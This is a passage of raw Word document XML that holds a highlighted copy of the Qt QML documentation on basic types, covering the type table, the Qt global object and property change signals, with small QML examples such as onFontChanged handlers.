        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>module</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> are listed below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="919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177"/>
        <w:gridCol w:w="8018"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidTr="00D815C8">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28" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>date</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Date value</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29" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>point</w:t>
              </w:r>
            </w:hyperlink>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Value with x and y attributes</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30" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>rect</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Value with x, y, width and height attributes</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31" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>size</w:t>
              </w:r>
            </w:hyperlink>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Value with width and height attributes</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32" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>color</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ARGB color value. The type refers to an ARGB color value. It can be specified in a number of ways:</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33" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>font</w:t>
              </w:r>
            </w:hyperlink>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Font value with the properties of QFont. The type refers to a font value with the properties of QFont</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34" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>matrix4x4</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A matrix4x4 type is a 4-row and 4-column matrix</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35" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>quaternion</w:t>
              </w:r>
            </w:hyperlink>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A quaternion type has scalar, x, y, and z attributes</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36" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>vector2d</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A vector2d type has x and y attributes</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37" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>vector3d</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="EEEEEE"/>
            </w:tcBorders>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Value with x, y, and z attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D815C8" w:rsidRPr="002230B8" w:rsidTr="00D815C8">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId138" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>vector4d</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75" w:type="dxa"/>
              <w:bottom w:w="75" w:type="dxa"/>
              <w:right w:w="75" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A vector4d type has x, y, z and w attributes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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t>The</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId139" w:history="1">
        <w:r w:rsidRPr="007874AF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>global object</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> provides </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>useful functions for manipulating values of basic types</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Currently </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>only QML modules which are provided by Qt may provide their own basic types</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, however this may change in future releases of Qt QML. In order to use types provided by a particular QML module, clients must import that module in their QML documents.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00FD0330">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="201" w:name="property-change-behavior-for-basic-types"/>
      <w:bookmarkStart w:id="202" w:name="_Toc483000575"/>
      <w:bookmarkStart w:id="203" w:name="_Toc483003596"/>
      <w:bookmarkStart w:id="204" w:name="_Toc483603927"/>
      <w:bookmarkStart w:id="205" w:name="_Toc483605147"/>
      <w:bookmarkEnd w:id="201"/>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Property Change Behavior for Basic Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="202"/>
      <w:bookmarkEnd w:id="203"/>
      <w:bookmarkEnd w:id="204"/>
      <w:bookmarkEnd w:id="205"/>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9173CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some basic types have properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: for example, the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId140" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>font</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type has</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pixelSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</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family</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bold</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties. Unlike properties of</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId141" w:anchor="qml-object-types" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>object types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, properties of basic types </w:t>
      </w:r>
      <w:r w:rsidRPr="009173CC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do not provide their own property change signals</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. It is only possible to create a property change signal handler for the basic type property itself:</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// invalid!</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onFont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pixelSizeChanged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doSomething</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// also invalid!</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font </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onPixelSizeChanged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doSomething</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// but this is ok</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="009173CC" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>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9173CC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009173CC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onFontChanged</w:t>
      </w:r>
      <w:r w:rsidRPr="009173CC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="009173CC">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> doSomething</w:t>
      </w:r>
      <w:r w:rsidRPr="009173CC">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00B307B1" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B307B1">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lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Be aware, however, that a property change signal for a basic type </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5746">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is emitted</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5746">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>whenever</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5746">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5746">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>any</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5746">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007F5746">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>of its attributes have changed</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, as well as when the property itself changes. Take the following code, for example:</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Text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onFontChanged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console</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log</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"font changed"</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Text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id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otherText </w:t>
      </w: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focus</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// changing any of the font attributes, or reassigning the property</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com"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="55FFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>// to a different font value, will invoke the onFontChanged handler</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Keys</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onDigit1Pressed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font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pixelSize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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</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Keys</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onDigit2Pressed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font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b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font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b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00D815C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815C8">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
